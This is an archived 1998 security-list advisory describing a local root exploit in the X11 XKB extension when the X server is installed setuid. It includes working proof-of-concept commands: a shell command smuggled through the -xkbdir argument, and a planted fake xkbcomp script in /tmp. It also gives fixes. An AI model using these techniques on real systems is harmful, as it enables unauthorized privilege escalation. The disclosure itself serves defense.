The OpenNET Project
 
Search (keywords):  SOFT ARTICLES TIPS & TRICKS SECURITY
LINKS NEWS MAN DOCUMENTATION


[linux-security] serious security problem in XKB


<< Previous INDEX Search src Set bookmark Go to bookmark Next >>
X-RDate: Thu, 05 Feb 1998 12:17:18 +0500 (ESK)
Date: Tue, 3 Feb 1998 20:26:16 +0100 (MET)
From: Pavel Kankovsky <[email protected]>
To: [email protected], [email protected]
Subject: [linux-security] serious security problem in XKB

The Neverending Story of X11 Insecurity continues...

Summary:

On a system where X11R6.3-based Xserver with XKEYBOARD extension (R6.1 is
probably affected too) is run in setuid or setgid enviroment (e.g. typical
XFree86 installation has XF86_* installed setuid root), local users can
exploit a "feature" of XKB implementation to execute arbitrary commands
with the extra privileges.


Quick vulnerability check:

$ Xserver -xkbdir 'id > /tmp/I_WAS_HERE;'
[exit X server]
$ grep root /tmp/I_WAS_HERE && echo 'Gotcha!'


Quick fix:

1. as usual chmod u-s,g-s all installed Xserver binaries (*)
2. use xdm or a SAFE and PARANOID wrapper to start Xserver

(*) and unsafe or not-paranoid-enough setuid/setgid wrappers
    (current Debian wrapper falls into this category)


Details:

In fact, there are (at least) two distict problems in XKB implementation,
both related to the use of -xkbdir option.

1. xkbcomp is invoked using system() or popen()
   any shell metacharacters included in -xkbdir argument are interpreted

[demonstrated by the "quick vulnerability check"]

2. a user supplied instance of xkbcomp is invoked
   -xkbdir argument is used to build the path to the compiler

$ cat > /tmp/xkbcomp
#!/bin/sh
id > /tmp/I_WAS_HERE
[ctrl+d]
$ chmod a+x /tmp/xkbcomp
$ Xserver -xkbdir /tmp
[X server executes /tmp/xkbcomp]


Further reading:

xc/programs/Xserver/xkb/xkbInit.c
xc/programs/Xserver/xkb/ddxLoad.c
xc/programs/Xserver/xkb/ddxList.c


--Pavel Kankovsky aka Peak   [ Boycott Microsoft -- http://www.vcnet.com/bms ]

-- 
----------------------------------------------------------------------
Please refer to the information about this list as well as general
information about Linux security at http://www.aoy.com/Linux/Security.
----------------------------------------------------------------------

To unsubscribe: mail -s unsubscribe [email protected] < /dev/null

<< Previous INDEX Search src Set bookmark Go to bookmark Next >>



Партнёры:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей
Created 1996-2024 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру